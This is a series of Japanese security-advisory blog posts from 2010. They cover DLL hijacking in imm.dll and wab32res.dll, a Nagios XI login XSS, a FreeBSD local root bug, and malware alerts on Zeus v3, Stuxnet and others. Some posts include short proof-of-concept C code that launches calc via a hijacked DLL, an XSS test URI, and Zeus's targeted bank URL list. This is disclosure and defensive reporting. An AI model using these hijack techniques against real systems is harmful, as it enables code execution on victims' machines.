Windowsプログラムグルップ(imm.dll)DLLハイジャック問題について

本件のセキュリティ情報は前回の内容の続きです。
Windows OSのプログラムグルップのDLL(imm.dll)にセキュリティバグがありパソコンのシステム権限を取られる可能性とステムのコマンドを実行される可能性が高いです。本件の問題について「.grp」ファイルを使っているWindowsシステムに影響が出ます。

再現仕方は下記のコードをコンパイルしたらimm.dllにリネームし、「.grp」があるファイルのフォルダーにコピーをすると再現が出来ます。この再現方法はインターネットで交換されている状況です。もしマルウェアは本件の問題情報を使うとマルウェア感染仕組みを作くる可能性が高いです。imm.dllと.grpの関係セキュリティパッチが必要です。

#include ＜windows.h＞
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}

現在メーカーからの対応を待ち状況になり、現時点では本件セキュリティ問題はゼロデイ状況です。
----
http://0day.jp
ゼロデイ・リサーチチーム
アドリアン　ヘンドリック

Windowsコンタクト(wab32res.dll)DLLハイジャックエクスプロイト

Microsoft Windows Contacts DLL(wab32res.dll)のハイジャックexploitを発見されまして、現在インターネットで再現情報が交換されている状況です。
「.contact, .group, .p7c, .vcf, と .wab ファイル」を使っているWindpwsOSに影響が出来ます。(wab32res.dll)の中にセキュリティバグがあります、本件の問題を使われたら(wab32res.dll)をincludeされたらシステムのadministrator権限を取られ、他のシステムコマンドを実行する事が出来ます。詰まり下記のやり方です

gcc -shared -o wab32res.dll Contacts-DLL.c

*/
#include ＜windows.h＞
int hax()
{
WinExec("calc", 0);
exit(0);
return 0;
}

本問題の解決方法はwab32res.dllのセキュリティパッチが必要ですがメーカーからの対応待ちとなります。パッチが出るまでに本件セキュリティ問題はゼロデイ状況になり、ご認識を下さい。
---
http://0day.jp
ゼロデイ・リサーチチーム
アドリアン・ヘンドリック

TrendMicroインターネットセキュリティPro 2010のセキュリティ問題について

昨日からTrendMicroインターネットセキュリティPro 2010のセキュリティ問題が発見されました。

ActiveXのextSetOwnerの所にバグがあり、リモート側からセキュリティ問題が出る可能性が出ます。

詳細な説明は下記のリファレンスurlとなります↓

http://seclists.org/fulldisclosure/2010/Aug/294
http://www.zerodayinitiative.com/advisories/ZDI-10-165/

下記は本件セキュリティ問題の再現コードとなります、おそらく20件のオンラインサイトに現在交換されている状況です。


---
株式会社ケイエルジェイテック
http://www.kljtech.com
セキュリティモニターセンター

「iphlpapi.dll」のIcmpSendEcho2ExのbreakのDoSについて

Windows OSのiphlpapi.dllライブラリーにある「IcmpSendEcho2Ex」のセキュリティ問題（Microsoft Windows DoS IcmpSendEcho2Ex interrupting)が発見されました。

問題の説明↓

本件問題について「IcmpSendEcho2Ex」を実行最中にbreakがかけったらWindowsがフリーズになってしまいます(DoS状態になります)。本問題に大してローカル側攻撃される可能性があります。現時点ではゼロデイ状況になります。

再現仕方↓

本件問題についての再現ソースコードがインターネットで交換されている状況です。アクセスはこちらとなります。

再現方法は下記のマークされたコードで実行したら問題が起きます。
「IcmpSendEcho2Ex」のコールした時に無い存在のIPアドレスを相手にして使う必要があります、その時にWAITの時間がかけってしまい本件のエラーが必ず起きてしまいます。
再現した環境はWindows 7でした。

リファレンス↓

http://inj3ct0r.com/exploits/13777/
http://nullbyte.org.il/

credit: pupipup33@gmail.com

---
http://0day.jp
ゼロデイリサーチチーム
アドリアン・ヘンドリック

「FreeBSD 7.x と 8.x」のrootエクスプロイト問題(ローカル側)について

FreeBSD 7.xと8.xのroot権限エスカレーションのバグが発見されております。

問題の説明↓

問題情報についてshellシステムのバグです。ようはfreebsd権限のセキュリティ仕組みやshell(sh)のバグですが、rootじゃないユーザがある条件shellバイナリーcodeを実行したらroot権限を取る事が出来ます。32ビットと64ビットシステムに影響が出ます。
本件の問題再現についてユーザのコンパイル環境が必要です。基本的にはローカル側の問題ですが、ウェブのCSSセキュリティ問題とれんけいしたらリモート側からの問題になる可能性もあります。
本件のパッチが未だ出ない状況でゼロデイ問題になる可能性が高いですのでここでアナウンスをさらせて頂きます。

本件のセキュリティ問題情報の履歴は下記となります↓

2010年8月17日 FullDisclosureでアナウンス
2010年8月18日 YouTubeビデオデモをアップ
2010年8月19日 再現ソースコードをリリース
2010年8月25日 0day.jpの方で再現確認済み

再現仕方↓

本件の問題についてデモビデオはこちら↓

再現確認の為に上記のビデオで使ったコードはこちらへ見えます。

リファレンスについて下記のURLになります↓

http://seclists.org/fulldisclosure/2010/Aug/217

---
http://0day.jp
ゼロデイリサーチチーム
アドリアン・ヘンドリック

Nagios XIのログインXSS(CSS)セキュリティ問題について

本件のセキュリティ問題についてNagiosXIの環境に影響があります。Nagios 2009R1.3以上には影響されておりません。

問題の説明↓

Nagios XIログイン管理インターフェースにXSS問題が発見されました。
本件のセキュリティ問題をマルウェア関係者が使われたらNagiosシステムにリモートから認証なしでログインが出来る状況となります。具体的にlogin.phpでのjavascriptインジェックションセキュリティ制限曖昧問題が発見しました。

追加セキュリティ問題登録情報は下記となります↓

Vuln ID: NGENUITY-2010-007
Class: Cross-Site Scripting (XSS)
CVE: N/A
Remote: Yes
Local: No
Published: 20 Aug 2010 00:07:08 -0700
Updated: 25 Aug 2010 19:44:01 JST
Credit: adam_baldwin () ngenuity-is com
Vulnerable: Nagios 2009R1.2以下

再現仕方↓

下記は再現の為にURIですが、下記のURLをNagiosログインページ(login.php)に投げたら影響があるバーションならログインされる状況となります
http://example.com/nagiosxi/login.php?%22;alert%281%29;//

解決方法↓

Nagios XIバーション2009R1.3以上にアップグレードが必要（メーカよりのおすすめアドバイスです）

リファレンス↓

http://ngenuity-is.com/advisories/2010/aug/19/nagios-xi-login-xss/
http://seclists.org/fulldisclosure/2010/Aug/221

---
http://0day.jp
ゼロデイリサーチチーム
アドリアン・ヘンドリック

【zeroday】「wab32res.dll」のDLLハイジャックについて

Windows OSのアドレス帳のシステムのDLLセキュリティ問題が発見されました。
本件のセキュリティ問題はWindows OSのアドレス帳のデータ「.vcf」ファイルを開いたら影響にされる事になります。もしかしたら「.vcf」以外なファイル種類にも影響が出ます。バグはwab32res.dllの中に発見しました。デサインエラーのバグを思われ現在未だ調査最中です。本件のセキュリティバグに付いてMicrosoft社に報告済み状況ですが未だレスポンスが来てません。ゼロデイ問題になる可能性は高いのですがこのブログに報告させて頂きます。

確認に付いては下記コードではっきり見えます↓


詳しい情報について他のブログサイトにも書いたあるので、URLは下記となります。
http://www.attackvector.org/new-dll-hijacking-exploits-many/

本件の追加セキュリティ情報登録データは下記になります（アップデート中）

Class: Design Error
CVE: N/A
Remote: Yes
Local: Yes
Published: 24 Aug 2010 13:57:42 -0500
Updated: 25 Aug 2010 19:22:00 JST
Credit: matt () attackvector org
Vulnerable: Windows Address Book DLL (wab32res.dll)

---
http://0day.jp
ゼロデイリサーチチーム
アドリアン・ヘンドリック

【マルウェアアラート】「BlackControl」P2Pトロイ

本件のトロイマルウェアは今月18日に発見されました。

感染仕方がマルウェアP2P、メールにマルウェア添付とウェブでマルウェアダウンロード仕組みです。

サンプルは日本に発見されました(メール添付)、ご注意下さい。

感染されたらマルウェアスパムを遅れます、スパム内容サンプルをこのメッセージに添付しました。

詳しく情報は下記のurlへご確認下さい。

http://www.securelist.com/en/descriptions/P2P-Worm.Win32.BlackControl.g

---
株式会社ケイエルジェイテック
http://www.kljtech.com
マルウェアモニターセンター

【マルウェア情報】Android携帯経由のSMSトロイ発見

昨日Android携帯経由のSMSトロイが発見されております。

本件のトロイはAndroid携帯ダウンロードページにアップロードされてます。形的には偽物メディアプレーヤーソフトウェアです。
本件のトロイに感染されたらAndroid携帯がバックグラウンドの動きが始まり、沢山smsメッセージをアドレス帳にある情報に送ってしまいます。
送ったメッセージの中に感染された携帯にある個人情報が入ってしまったようです。

本件のマルウェアについて色んなニュースサイトに現在話題になりました、リファレンスは下記のurlとなります。

http://news.cnet.com/8301-27080_3-20013222-245.html

---
株式会社ケイエルジェイテック
http://www.kljtech.com
ウイルスモニターセンター

【マルウェア情報】Zeus/Zbotバーション３の機能レビュー

今迄Zeusボットネットワークから送ってくれたのスパムメールやマルウェアメールが沢山発見されました。はじめて発見された時から、Zeus/ZBotが、クライムウェアパックに付いて色々アドバンス技術が持っているマルウェアシステムだと思って我々はずっとモニターしております。前回のブログ内容にもZeus/ZBotの事を沢山書きました(【1】 【2】 【3】 【4】)

今現在Zeus/ZBotの”クライムパック”ボットネット事態にメージャーバーションアップがあります。先週から「Zeusボットネットバーション３」はインターネットのブラックマーケットで＄４００で販売されており、現状一番人気ボットネットになっております。下記はZeus/ZBot v3の新しい機能のサマリーです↓

１）銀行ターゲットの違い
前回バーションと違い、Zeus v3はスペイン、ドイツ、アメリカとイギリスのオンライン銀行の情報を狙ってます（前回は全世界の銀行HTTP/HTTPS情報を設定が出来ましたは今回は出来ない）

２）プリ・セットの設定ファイル
標準設定の中に沢山オンライン銀行のアクセス情報が入ってます、詰り下記の一覧です（Zeus v3の設定ファイルからコピーペした）
#
https://*chase.com/*
#
http*://*first-direct.com*
#
http*://*h-l.co.uk*
#
http*://*hsbc.co.uk*
#
http*://*online.ybs.co.uk*
#
https://bnycash.bankofny.com/
#
http*://*ulsterbankanytimebanking.co.uk*
#
https://www.53.com/servlet/efsonline/index.html*
#
https://www.bankofamerica.com/*
#
https://www.bbvacompass.com/contact/
#
https://passport.texascapitalbank.com/Default.aspx
#
https://www.halifax-online.co.uk/MyAccounts/MyAccounts.aspx*
#
https://www.nashvillecitizensbank.com/olbb/Login2FA.asp
#
https://www.nationalcity.com/consultnc/
#
https://www.ffsbkyonline.com/*
#
https://www.frostbank.com/sitemap/Pages/default.aspx
# https://www.cbolobank.com/business/login/Login.jsp
# https://www.commerzbanking.de/*/cowis.js*
#
https://meine.deutsche-bank.de/*
#
https://finanzportal.fiducia.de/*/portal*
#
https://internetbanking.gad.de/ptlweb/WebPortal*
#
https://be.cajamurcia.es/BEWeb/2043/6043/portal_inicio_identificacion.action*
#
https://*.cajasoldirecto.es/2106/js/MOD3.js*
#
https://www.caixaterrassa.es/SESSIONS/SFObe*

３）Zeus/Zbotのコントロール国
前回と同じロシアからです。

４）Zeus/ZBotのターゲット情報
下記2010年のZeus/ZBotの国ベースのターゲット割合情報です

credit: CA

５）最新版Zeus３から送ってくれたメールサンプル情報↓
下記みたいなのサンプルが一番多いですが内容はころころ変わります。現状では英語版が多いですので日本語版のサンプルが見つかりません。但し、Zeusボットネットから投げてくれたメールは日本にも沢山発見されてます。

---
http://0day.jp
マルウェアリサーチチーム

Microsoft8月分のセキュリティアップデートのアドバンス報告について

Microsoft社より8月分のセキュリティアップデートのアドバンス報告が出ました。
アクセスはこちらとなります。
セキュリティアップデートリリース予定は2010年8月10日になります。今回の14件のアップデートがリリースされる予定で、8件はクリティカルアップデート(Microsoft Windows, Internet Explorer, OfficeとSilverlight)と6件は「important」アップデートになります(Microsoft Windows OSとOffice)
---
株式会社ケイエルジェイテック
http://www.kljtech.com
セキュリティモニターセンター

【zeroday】Apple iOSマルシプルセキュリティ問題について

本件ゼロデイセキュリティ問題について下記のOSに影響があります↓

Apple iPod Touch 3.1.3
Apple iPod Touch 3.1.2
Apple iPhone 3.1.3
Apple iPhone 3.1.2
Apple iPad 3.2.1
Apple iPad 3.2
Apple iOS 4.0.1
Apple iOS 4

追加vulnerability情報↓

Remote: Yes
Local: Yes
Published: Aug 02 2010 12:00AM
Updated: Aug 04 2010 04:35PM
Credit: comex

問題の説明↓

iOSのマルシプルセキュリティ問題が沢山発見されました、本件について問題情報はリモート側からエクスプロイト問題、セキュリティバイパス問題、ユーザ個人情報問題となります。iOS バーション4.0.1以下の影響があります。現在アップデートがありませんので本件はゼロデイの状況になってしまいます。

リファレンス↓

http://www.apple.com/iphone/softwareupdate/
http://www.securityfocus.com/bid/42151

---
http:0day.jp
ゼロデイセキュリティリサーチチーム

Linux Kernelマルチプルセキュリティアップデートについて

下記 まとめて本日3件Linux Kernelのセキュリティアップデート情報です。
アップデートも出ましたので、ダウンロード情報下記の情報で確認が出来ます。

１）Linuxカーネル「Donor File」セキュリティバイパス

説明↓
Linuxカーネル2.6.xのDonor File仕組みのバグがあり、本件の問題はローカル側のセキュリティ問題です、悪戯ユーザが他のユーザの権限を取れます。

セキュリティバグID情報↓
Class: Kernel 2.6.xのCode Bug
CVE: CVE-2010-2066
Remote: No
Local: Yes
Published: Jul 08 2010 12:00AM
Updated: Aug 03 2010 08:55AM
Checked: Aug 05 2010 23:33PM JST

リファレンス↓
http://www.securityfocus.com/bid/41466/

２)カーネルのe1000 Ethernet Card Driver Kernel Memory Disclosure

説明↓
e1000 Ethernetドライバーのバグがあり、e1000のカードを使っているシステム
に影響が出ます。本問題に当たってメモリーエラーが出てシステムのDoS状況になる可能性が高いです。

セキュリティバグID情報↓
Class: Boundary Condition Error
CVE: CVE-2004-0535
CVE-2004-0535
Remote: No
Local: Yes
Published: May 14 2004 12:00AM
Updated: Aug 05 2010 07:46PM
Credit: Chris Wright

リファレンス↓
http://rhn.redhat.com/errata/RHSA-2004-327.html
http://rhn.redhat.com/errata/RHSA-2004-413.html
http://rhn.redhat.com/errata/RHSA-2004-418.html
http://www.kernel.org/pub/linux/kernel/v2.4/testing/patch-2.4.27.log

３）LinuxカーネルFloating Point Exceptionハンドルのバグについて

説明↓
カーネルのfloating-pointハンドルのバグがあり、ローカル側からシステムのDoS状況攻撃が出る可能性があります。全体Linuxカーネルに影響されると思われます。

セキュリティバグID情報↓
Class: Design Error
CVE: CVE-2004-0554、CVE-2004-0554
Remote: No
Local: Yes
Published: Jun 14 2004 12:00AM
Updated: Aug 05 2010 07:46PM
Credit: Stian Skjelstad

リファレンス↓
http://rhn.redhat.com/errata/RHSA-2004-255.html
http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html

---
http://0day.jp
セキュリティリサーチチーム

【マルウェア警告】「Stuxnet」のWindowsワーム(USB)について

マルウェアサマリー↓

マルウェア名：「Stuxnet」
カテゴリー：「ワーム」
OS：「Windows..クライアント/サーバ」
発見履歴↓
※2010年7月真中： ルートキット、ワーム、トロイドロッパーの機能発見
※7月22日から：暗号化機能発見
※7月30日から：ワームのEPIDEMICのピーク時期

マルウェアの説明↓

現在言われている「Stuxnet」ワームはWindowsOSのSHELL実行のバグ情報を使われて、インターネットで沢山発見されているワームです。「Stuxnet」ワームのディストリビューション仕方はメールの添付とマルウェアウェブページです。
実は7月真中の時にはじめて本件のワームバイナリーが発見されました。
その時にワームの機能が未だ無くてルートキットの形でした。
その後、ルートキットからワームの機能を追加されて、Windows SHELLのセキュリティ問題を乗られて沢山感染実験がレポートされました。

マルウェアの動き説明↓

「Stuxnet」ワームはリムーバブルデバイスの「autorun.inf/自動実行」経由のマルウェアです。感染のトリッガーはリムーバブルデバイスをさした時です。感染されたらルートキットのステルス機能の動きが始まり、最初の頃では中々検知しにくいでした。
一番流行った時期はMicrosoft Windows Shellのバグをアナウンスした後です。その時に「Stuxnet」ワームがWindowsショットカット「.LNK」のファイルを使って、SHELLを実行してUSBドライブ感染仕組みが結構流行りました。

マルウェアの名前敵に、色々がありメージャーメーカーのマルウェア名は下記とたります↓

W32.Stuxnet (Symantec)
W32/Stuxnet.A (Norman)
TrojanDropper:Win32/Stuxnet.A (Microsoft)
Trojan-Dropper.Win32.Stuxnet.xx (Kaspersky)
Stuxnet (McAfee)

詳細な感染仕方説明↓

USBデバイスを繋がった時にStuxnetワームが「.LNK」ショットカットファイルを作りました。クリックされたらWindowsSHELLを実行されて２う種類ルートキットマルウェアをパソコンの「System32\drivers\」にインストールされてしまいます、ルートキットのファイル名は↓

Mrxnet.sys - 又は 「W32/Stuxnet.E」
mrxcls.sys - 又は 「W32/Stuxnet.D」

ルートキットが実行されたらSTUXNETマルウェアをパソコンにインストールが始まり、下記のレジストリーに追加されております↓

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxCls "ImagePath"
Data: \??\C:\WINDOWS\system32\Drivers\mrxcls.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxNet "ImagePath"
Data: \??\C:\WINDOWS\system32\Drivers\mrxnet.sys

上記のコマンドの意味は毎回WindowsOSを実行したらMrxnet.sysとmrxcls.sysのマルウェアドライバーをコールする事が出来ます。

Stuxnetワームも下記の暗号されたマルウェアファイルを「windows\inf」フォルダーにコピーしてしまいます。

Mdmcpq3.PNF、Mdmeric3.PNF、Oem6c.PNF、Oem7a.PNF

注意点は上記のファイルをスキャンしたらマルウェアじゃないとの結果になります※
Stuxnetワームが色んな暗号化認証を使っています、最新発見された認証ファイルは下記となります↓


繋がったリムーバブルドライブに下記のマルウェアファイルをコピーされてしまいます↓

「~wtr(xxxx).tmp」
「~wtr[xxxx].tmp」
コピー(xxxx).LNK
コピーのコピー(xxxx).LNK

STUXNETワームの種類によりますが、バックドアTCPポートを開いたケースもあります、バックドアワーム機能が持っています。

解決方法は↓

WindowsOSのSHELLバグのセキュリティアップデートをインストールが必要、アクセスはこちらです。感染されたパソコンについてマルウェア対策ソフトでスキャンが必要です。

本件についてのURLリファレンス（有名なアドバイサリーのみ）↓

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568
http://www.microsoft.com/technet/security/advisory/2286198.mspx
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://blogs.technet.com/b/msrc/archive/2010/07/29/out-of-band-release-to-address-microsoft-security-advisory-2286198.aspx
http://isc.sans.edu/diary.html?storyid=9181
http://isc.sans.edu/diary.html?storyid=9190
http://www.kb.cert.org/vuls/id/940193
http://www.securityfocus.com/bid/41732
http://secunia.com/advisories/40647

---
http://0day.jp
マルウェアリサーチ
アドリアン・ヘンドリック

WindowsOSの「.lnk」ショットカットのバグフィックス予定について

マイクロソフト社より、今週特別なセキュリティパッチをリリースする予定というアナウンスが出ました。
原因は本件のセキュリティ問題情報を使われているマルウェアが現在流行ってしまう状況です。例えばstuxnet(USBワーム)とsality.ATマルウェアです。

リファレンスは下記となります↓
http://www.microsoft.com/technet/security/advisory/2286198.mspx

http://blogs.technet.com/b/msrc/archive/2010/07/29/out-of-band-release-to-address-microsoft-security-advisory-2286198.aspx

下記は本件のデモビデオとなります↓

---
http://0day.jp/
ゼロデイセキュリティリサーチ